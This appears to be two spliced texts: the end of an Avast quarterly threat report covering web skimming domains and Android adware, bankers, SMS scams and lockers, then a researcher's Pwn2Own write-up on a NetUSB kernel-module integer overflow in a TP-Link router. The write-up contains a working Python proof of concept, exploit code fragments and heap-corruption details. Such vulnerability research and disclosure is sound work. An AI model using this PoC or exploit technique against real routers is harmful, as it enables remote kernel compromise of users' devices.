In Q1/22, the most prevalent web skimming malicious domain was naturalfreshmall[.]com, with more than 500 e-commerce sites infected. The domain itself is no longer active, but many websites still try to retrieve malicious content from it. Unfortunately, this means that the administrators of these sites still have not removed the malicious code, and the sites are likely still vulnerable. Avast protected 44k users from this attack in the first quarter.

The heatmap below shows the most affected countries in Q1/22 – Saudi Arabia, Australia, Greece, and Brazil. Compared to Q4/21, Saudi Arabia, Australia, and Greece stayed at the top, while in Brazil we protected almost twice as many users as in the previous quarter. Multiple websites were infected in Brazil, some with the aforementioned domain naturalfreshmall[.]com. In addition, we tweeted about philco.com[.]br, which was infected with yoursafepayments[.]com/fonts.css. And last but not least, pernambucanas.com[.]br was infected with malicious JavaScript hidden in the file require.js on the website.

Overall, the number of protected users remained almost the same as in Q4/21.

Pavlína Kopecká, Malware Analyst

Mobile-Related Threats

Adware/HiddenAds

Adware maintains its dominance over the Android threat landscape, continuing the trend from previous years. Generally, the purpose of adware is to display out-of-context advertisements to the device user, often in ways that severely impact the user experience. In Q1/22, HiddenAds, FakeAdblockers, and others spread to many Android devices; these applications often display device-wide advertisements that overlay the user’s intended activity or limit the app’s functionality by displaying timed ads without the ability to skip them.

Adware comes in various configurations; one popular category is the stealthy installation. Such apps share common features that make them difficult for the user to identify. Hiding the application’s icon from the home screen is a common technique, as is using blank application icons to mask their presence. The user may struggle to identify the source of the intrusive advertisements, especially if the applications have a built-in delay timer after which they display the ads. Another adware tactic is to use in-app advertisements that are overly aggressive, sometimes to the extent that they make the original app’s intended functionality barely usable. This is common especially in games, where timed ads are often shown after each completed level; frequently, the ad screen time greatly exceeds the time spent playing the game.

The Google Play Store has previously been used to distribute malware, but recently, actors behind these applications have changed tactics to use browser pop-up windows and notifications to spread the Adware. These are intended to trick users into downloading and installing the application, often disguised as games, ad blockers, or various utility tools. Therefore, we strongly recommend that users avoid installing applications from unknown sources and be on the lookout for malicious browser notifications.

According to our data, India, the Middle East, and South America are the most affected regions. But Adware is not strictly limited to these regions; it’s prevalent worldwide.

As can be seen from the graph below, Adware’s presence in the mobile sphere has remained dominant but relatively unchanged. Of course, there’s slight fluctuation during each quarter, but there have been no stand-out new strains of Adware as of late.

Bankers

In Q1/2022, some interesting shifts were observed in the banking malware category. With Cerberus/Alien and its clones still leading the scoreboard by far, the battle for second place saw a jump: Hydra replaced the previously significant threat posed by FluBot, which has been on the decline throughout Q1.

Different banker strains have been reported to use the same distribution channels and branding, which we can confirm from our observations. Many banking threats now reuse the proven techniques of masquerading as delivery services, parcel tracking apps, or voicemail apps.

After FluBot’s departure from the scene, we observed an overall slight drop in the number of affected users, but this seems only to be a return to the numbers we observed last year, just before FluBot took the stage.

The most targeted countries remain Turkey, Spain, and Australia.

PremiumSMS/Subscription scams

While PremiumSMS/subscription-related threats may not be as prevalent as in previous years, they are certainly not gone for good. As reported in the Q4/21 report, new waves of premium subscription-related scams keep popping up. Campaigns such as GriftHorse and UltimaSMS made their rounds last year, followed by yet another similar campaign dubbed DarkHerring.

The main distribution channel for these seems to be Google Play, but they have also been observed being downloaded from alternative channels. As before, this scam preys on the mobile operators’ subscription scheme, where an unsuspecting user is lured into giving out their phone number. The number is later used to register the victim for a premium subscription service. Due to the stealthiness of the subscription and the hassle of canceling it, this can go undetected for a long time, causing the victim significant monetary loss.

While the primary targets of these campaigns seem to remain the same as in Q4/21 – Middle Eastern countries like Iraq, Jordan, Saudi Arabia, and Egypt – the scope has broadened and now includes various Asian countries as well, with China, Malaysia, and Vietnam amongst the riskiest.

As can be seen from the quarterly comparisons in the graph below, the spikes in activity of the respective campaigns are clear, with UltimaSMS and GriftHorse causing the spike in Q4/21 and DarkHerring behind the Q1/22 spike.

Ransomware/Lockers

Ransomware apps and Lockers that target the Android ecosystem often attempt to ‘lock’ the user’s phone by disabling the navigation buttons and taking over the Android lock screen to prevent the user from interacting with the device and removing the malware. This is commonly accompanied by a ransom message requesting payment to the malware owner in exchange for unlocking the device.

Among the most prevalent Android Lockers seen in Q1/22 were Jisut, Pornlocker, and Congur. These are notorious for being difficult to remove and, in some cases, may require a factory reset of the phone. Some versions of lockers may even attempt to encrypt the user’s files; however, this is not frequently seen due to the complexity of encrypting files on Android devices.

The threat actors responsible for this malware generally rely on spreading through third-party app stores, game cheats, and adult content applications.

A common infection technique is to lure users through popular internet themes and topics – we strongly recommend that users avoid attempting to download game hacks and mods and ensure that they use reputable websites and official app stores.

In Q1/22, we’ve seen spikes in this category, mainly related to the Pornlocker family – apps masquerading as adult content providers – predominantly targeting users in Russia.

In the graph above, we can see the spike caused by the Pornlocker family in Q1/22.

Ondřej David, Malware Analysis Team Lead
Jakub Vávra, Malware Analyst

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alexej Savčin
  • Anh Ho
  • David Álvarez
  • Igor Morgenstern
  • Jakub Křoustek
  • Jakub Vávra
  • Jan Holman
  • Jan Rubín
  • Ladislav Zezula
  • Luigino Camastra
  • Martin Chlumecký
  • Martin Hron
  • Ondřej David
  • Pavel Novák
  • Pavlína Kopecká
  • Samuel Sidor
  • Vladimir Martyanov
  • Vladimír Žalud
Data analysts
  • Pavol Plaskoň
Communications
  • Dave Matthews
  • Stefanie Smith


Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools and learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I was quickly pretty horrified by what I found and wrote Longue vue 🔭 over the weekend, which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that the code quality was much better, and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced, with routers, printers and phones among the available targets. Exciting. Participating in that kind of competition has always been on my TODO list, and I had convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate in the contest, and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with routers, and the hardware was easy and cheap to get, so it felt like the right choice.

router targets

At least, that's what we thought the path of least resistance was. After attending the contest, it seems printers were at least as soft, and with a higher payout. But whatever, we weren't in it for the money, so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: we logged onto Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it; you just want one to be able to figure out which attack surfaces are interesting to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior I had found a post-auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker's perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable, so I needed to find another way.

Oh also, fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two lines of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low-hanging fruit and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020, but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam; he recommended ordering an FT232 USB cable, and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench, and got to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas to focus my time on. I did a bunch of reading, as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be good to try to break new ground, both to lower the chance of entering the competition with a duplicate and to maximize my chances of finding something that would allow me to enter the competition at all. But before thinking about duplicates, I needed a bug.

I started with some very basic attack surface enumeration: running processes, iptables rules, listening sockets, crontab, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting:

- the uhttpd HTTP server,
- the third-party dnsmasq service that could potentially be missing patches for upstream bugs (unlikely?),
- the tdpServer, which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router, I figured I would at least spend a few days looking at the one running on the target router. The HTTP server can run and invoke Lua extensions, and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions, which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug, but it was probably useless from an attacker's perspective. It was time to move on, as I didn't feel there was enough potential for me to find something interesting there.

Another thing I burned time on was going through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to check whether dnsmasq was properly patched against the vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed otherwise 😔. Dead end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that stood out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets, huh 🤔? Well, it turns out that after googling and looking around, those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I had seen this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild thing is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also no surprise to see that multiple vulnerabilities had been discovered and exploited in it in the past, and that TP-Link was indeed not the only vendor to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while, things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper into the code. After enumerating a lot of places where attacker input is parsed and used, I found one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug, because the code would try to read a very large number of bytes into this buffer, but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefully, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection) {
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data as I wanted. If you are interested in learning how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py, or read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

if __name__ == '__main__':
  main()

Another interesting detail was that the allocation function is mallocPageBuf, which I didn't know about. After looking into its implementation, it eventually calls into __get_free_pages, which is part of the Linux kernel. __get_free_pages allocates 2**n pages, and is implemented using what is called a binary buddy allocator. I wasn't familiar with that kind of allocator, and ended up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug gave me full control over the content, and I was able to overflow the pages with pretty much as much data as I wanted. The one thing I couldn't fully control was the size passed to the allocation: because of the integer overflow, I could only trigger a mallocPageBuf call with a size in the interval [0, 8]. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke __get_free_pages.
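To make the arithmetic concrete, here is a small sketch (the order computation is my assumption of what mallocPageBuf does based on the description above, not the driver's exact code):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
  // The driver reads a 32-bit length off the wire and adds 9 before allocating:
  // any length in [0xFFFFFFF7, 0xFFFFFFFF] wraps into [0, 8].
  uint32_t attacker_len = 0xFFFFFFFF;
  uint32_t alloc_size = attacker_len + 9; // 8 after the 32-bit wrap

  // Assumed mallocPageBuf behavior: round the size up to a power of two and
  // derive the order n (2**n pages) to request from __get_free_pages.
  unsigned order = 0;
  while ((4096u << order) < alloc_size)
    order++;

  printf("alloc_size=%u -> order %u\n", alloc_size, order); // alloc_size=8 -> order 0
  return 0;
}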

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob, so this lack of introspection wasn't going to work. What are my options?

Well, as I mentioned earlier, TP-Link maintains a GPL archive which has information on the Linux version they use, the patches they apply, and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point for debugging this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement over my current situation. I would be able to hook up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel from the GPL archive. On the surface, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest, I have mostly forgotten the details, but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering, but it was in fact not. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. So I decided to look at the problem from a different angle. I downloaded a Linux MIPS QEMU image from aurel32's website that booted just fine, and decided that I would merge the two kernel configurations until I ended up with a bootable image whose configuration was as close as possible to the kernel running on the device. Same kernel version, same allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob, I failed to really see the complexity there. So I started on this journey where I must have compiled easily 100+ kernels before being able to load and execute the NetUSB.ko driver in QEMU. The main challenge I had failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, driver A might expect a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device structure below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any type used by this structure can do the same, which means that looking at the main definition of a structure is not enough (see the toy example after the structure below).

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};
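To illustrate with a toy example (a hypothetical CONFIG_FOO flag, not the real net_device), the offset of every member following a conditional field shifts with the configuration:

#include <stddef.h>

// Hypothetical illustration: not the real net_device.
struct example {
#ifdef CONFIG_FOO
  void *foo_only;   // only present when CONFIG_FOO is set
#endif
  int b;
};

// With CONFIG_FOO defined:    offsetof(struct example, b) == 8 on a 64-bit build.
// Without CONFIG_FOO defined: offsetof(struct example, b) == 0.
// A driver built against one layout reads garbage when loaded against the other.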

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash, and look at the code / structures involved to see if a kernel configuration option would impact the layout of a relevant structure. From there, I could diff the kernel configuration of my bootable QEMU image against the one I had built from the GPL archive and see where the mismatches were. If there was one, I could simply turn the option on or off, recompile and hope that it didn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

user@host:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
root@debian-mips:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
root@debian-mips:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that might be useful (I probably forgot most of the other ones):

- I used debootstrap to easily install older Linux distributions until one worked fine with the package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as to cross-compile the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM, chroot into those folders, and SHOULD be able to reproduce what I described. Or at least, be very close to reproducing it.
- I cross-compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz, which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz.
- You can find the command line I used to start QEMU in start_qemu.sh, and dbg.sh attaches GDB to the kernel.

Enter Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The Linux kernel version was old enough that it didn't have a bunch of the more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets, Andrey Konovalov describes in detail an attack that looked like it could work for the bug I had found. Also, read the article, as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and, as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes), which would force blocks from the higher orders to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000, which would mean I could get a 0x1000 block adjacent to another 0x1000 block now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying quirks I hadn't noticed when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for it.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug in a kmalloc'd region instead, as I wouldn't have to deal with the same problems as above. I would still need to worry about placing the buffer adjacent to a juicy corruption target, though. After looking around for a bit longer, I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error, I started to notice that if I took a small pause after the allocation of the buffer but before overflowing it, an interesting structure would magically be allocated fairly close to my buffer. To this day, I haven't fully debugged where it exactly came from, but as this was my only lead, I went along with it.

The target kernel has neither ASLR nor NX, so my exploit is able to hardcode addresses and execute code directly from the heap, which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation, as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overwrites the head.next field of an adjacent wait_queue_head_t that is placed by the socket stack of the Linux kernel, replacing it with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). These are the definitions of the structures:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
